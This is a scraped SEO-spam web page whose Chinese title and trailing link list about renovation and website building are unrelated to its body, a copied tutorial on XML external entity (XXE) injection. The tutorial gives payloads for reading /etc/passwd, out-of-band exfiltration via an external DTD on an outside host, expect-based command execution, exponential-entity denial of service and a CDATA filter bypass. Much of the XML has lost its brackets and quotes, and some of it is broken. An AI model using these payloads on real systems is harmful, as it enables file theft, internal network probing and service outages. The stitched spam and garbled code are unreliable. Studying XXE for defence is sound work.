当前位置: 首页 > news >正文

南通装修网站大全宜昌哪里有做网站的

南通装修网站大全,宜昌哪里有做网站的,加强司法机关网站建设,网页设计与制作代做文章目录 一、XXE简介二、XXE原理三、XXE危害四、XXE如何寻找五、XXE限制条件六、XXE分类七、XXE利用1、读取任意文件1.1、有回显1.2、没有回显 2、命令执行#xff08;情况相对较少见#xff09;3、内网探测/SSRF4、拒绝服务攻击(DDoS)4.1、内部实体4.2、参数实体 八、绕过基… 文章目录 一、XXE简介二、XXE原理三、XXE危害四、XXE如何寻找五、XXE限制条件六、XXE分类七、XXE利用1、读取任意文件1.1、有回显1.2、没有回显 2、命令执行情况相对较少见3、内网探测/SSRF4、拒绝服务攻击(DDoS)4.1、内部实体4.2、参数实体 八、绕过基本XXE攻击的限制九、关联链接1、XML介绍2、靶场演示 一、XXE简介 XXEXML External Entity,XML外部实体注入攻击。 二、XXE原理 — — 攻击者通过构造恶意的外部实体当解析器解析了包含“恶意”外部实体的XML类型文件时便会导致被XXE攻击。XXE漏洞主要由于危险的外部实体引用并且未对外部实体进行敏感字符的过滤从而可以造成命令执行目录遍历等。 这里是不是很像XSS注入 — — 在解析XML文档的过程中关键字’SYSTEM’会告诉XML解析器entityex 实体的值将从其后的URI中读取。实体entityex的值会被替换为URI(file://etc/passwd)内容值。如下图 — — 因此攻击者可以通过实体将他自定义的值发送给应用程序然后让应用程序去呈现。 — — 简单来说攻击者强制XML解析器去访问攻击者指定的本地系统上或是远程系统上的资源内容。 三、XXE危害 导致可加载恶意外部文件、读取任意未授权文件恶意消耗内存进行dos攻击探测内网信息如检测服务、内网端口扫描、攻击内网网站等命令执行目录遍历等有些XML解析库支持列目录攻击者通过列目录、读文件获取帐号密码后进一步攻击如读取tomcat-users.xml得到帐号密码后登录tomcat的manager部署webshell。 四、XXE如何寻找 1、POST请求 2、MIME 文件传输格式为 XML 3、请求头中 Content-type: application/xml text/xml application/json 4、带有非常明显的xml标签的即自定义的标签 5、利用DNSLog来验证是否存在XXE 将数据包改一下 ?xml version1.0 encodingUTF-8 ? !DOCTYPE value [ !ENTITY xxe SYSTEM http://yu7bis.dnslog.cn ] valuexxe;/valueps可以修改其Content-Type为application/xml并尝试进行XXE注入五、XXE限制条件 网站是否开启了外部实体解析 因素一 libxml2.9.0 版本 默认开启了外部实体解析 因素二 网站管理员开启了外部实体解析 低版本php libxml2.9.1 设置了libxml_disable_entity_loader禁用加载外部实体的能力为FALSE 六、XXE分类 XXE的攻击方式分为显式攻击和盲攻击两种 显式攻击是攻击者能通过正常的回显将外部实体里的内容读取出来。盲攻击即不可见的回显可利用参数实体将本地文件内容读出来后作为URL中的参数向其指定服务器发起请求然后在其指定服务器的日志中读出文件的内容。 现实中存在的大多数XXE漏洞都是blind必须采用带外通道OOBOut-of-band)进行返回信息的记录这里简单来说就是攻击者必须有一台具有公网ip的主机。 七、XXE利用 1、读取任意文件 1.1、有回显 下面是XML.php内容 ?php $xml EOF ?xml version 1.0? !DOCTYPE ANY[!ENTITY f SYSTEM file:///etc/passwd ] xf;/x EOF; $data simplexml_load_string($xml); print_r($data); ?访问XML.php可以读取etc/passwd文件内容 1.2、没有回显 当页面没有回显的话可以将文件内容发送到远程服务器然后读取。 下面是XML.php内容 ?php ?xml version1.0 encodingutf-8? !DOCTYPE a[!ENTITY % f SYSTEM http://www.m03.com/evil.dtd%f; ] ab;/a $data simplexml_load_string($xml); print_r($data); ?下面是evil.dtd内容 !ENTITY b SYSTEM file:///etc/passwd2、命令执行情况相对较少见 php环境下xml命令执行要求php装有expect扩展。而该扩展默认没有安装正常人谁会去安装这东西啊所以命令执行的情况相对较少见。 下面是XML.php内容 ?php $xml EOF ? xml version 1.0 ? !DOCTYPE ANY[!ENTITY f SYSTEM except://ls ] xf;/x EOF; $data simplexml_load_string($xml); print_r($data); ?3、内网探测/SSRF 由于xml实体注入攻击可以利用http://协议也就是可以发起http请求。可以利用该请求去探查内网进行SSRF攻击。 4、拒绝服务攻击(DDoS) 通过创建一项递归的XML定义在内存中生成十亿个“Ha! ”字符串从而导致 DDos 攻击。原理为:构造恶意的XML实体文件耗尽可用内存因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中。 4.1、内部实体 攻击代码如下 !DOCTYPE data [ !ENTITY a0 dos!ENTITY a1 a0;a0;a0;a0;a0;a0;a0;a0;a0;a0; !ENTITY a2 a1;a1;a1;a1;a1;a1;a1;a1;a1;a1;!ENTITY a3 a2;a2;a2;a2;a2;a2;a2;a2;a2;a2; !ENTITY a4 a3;a3;a3;a3;a3;a3;a3;a3;a3;a3; ] dataa4;/data上面代码相当于有11010*1010*10*1010*10*10*1011111个实体引用这里文件大小只有30kb却超出了合法的实体引用数量上限。 4.2、参数实体 攻击代码如下 !DOCTYPE data SYSTEM http://127.0.0.1/dos.dtd [!ELEMENT data (#PCDATA) ] datag;/datahttp://127.0.0.1/dos.dtd文件的内容 !ENTITY a0 dos!ENTITY % a1 a0;a0;a0;a0;a0;a0;a0;a0;a0;a0; !ENTITY % a2 a1;a1;a1;a1;a1;a1;a1;a1;a1;a1;!ENTITY % a3 a2;a2;a2;a2;a2;a2;a2;a2;a2;a2; !ENTITY % a4 a3;a3;a3;a3;a3;a3;a3;a3;a3;a3; !ENTITY g %a4;八、绕过基本XXE攻击的限制 ?xml version1.0 encodingutf-8? !DOCTYPE data [!ELEMENT data (#ANY)!ENTITY % start ![CDATA[!ENTITY % goodies SYSTEM file:///sys/power/image_size!ENTITY % end ]]!ENTITY % dtd SYSTEM http://publicServer.com/parameterEntity_core.dtd%dtd; ] dataall;/data文件http://publicServer.com/parameterEntity_core.dtd的内容 !ENTITY all %start;%goodies;%end;这里是把XML语句拆成3个参数来绕过 九、关联链接 1、XML介绍 XML介绍 2、靶场演示 靶场演示
http://www.w-s-a.com/news/818469/

相关文章:

  • 做博客网站的php代码一建论坛建工教育网
  • 邢台网站制作费用单页营销网站后台
  • 红色网站建设的比较好的高校用vs2010做购物网站
  • 网站域名备案号查询网页设计实验报告总结模板
  • 什么软件 做短视频网站好大型论坛网站建设
  • 视频网站用什么cms网络运营与维护主要做什么
  • 设计网站主页要多少钱赣州制作网站百度
  • 什么叫高端网站定制网站收录大幅度下降
  • 汝城县网站建设公司aspx网站实例
  • 专业微网站营销diywap手机微网站内容管理系统
  • 盗版做的最好的网站温州logo设计公司
  • 网站建设 中山南充微网站建设
  • 企业网站更新什么内容免费设计软件下载
  • 夏天做哪些网站能致富做网站怎么每天更新内容
  • 个人网站的设计与开发网站建设流程中哪些部分比较重要
  • 招聘网站如何建设中国计算机网络公司排名
  • 工信部网站备案规定厦门在线制作网站
  • 商丘网站公司智联招聘手机app下载
  • 江西专业南昌网站建设中国专业的网站建设
  • 物流企业网站建设方案招标网站有哪些
  • 网站建设服务中企动力建筑工程网络进度计划备注填写范例
  • 电子商务网站开发与建设试卷php网站开发专业
  • 运城网站制作路90江苏省网站备案系统
  • 唐山做企业网站实体门店管理系统
  • 网站优化推广教程深圳网站建设世纪前线
  • 网站建设专家哪家好兰州网络推广执行
  • 广东住房和城乡建设厅网站王芃增加网站收录
  • 北京网站建设手机app电子商务网红营销的劣势
  • 网站 营销型wordpress获取4条文章标题
  • 浦东区建设工程监督网站建立全国统一的突发事件信息系统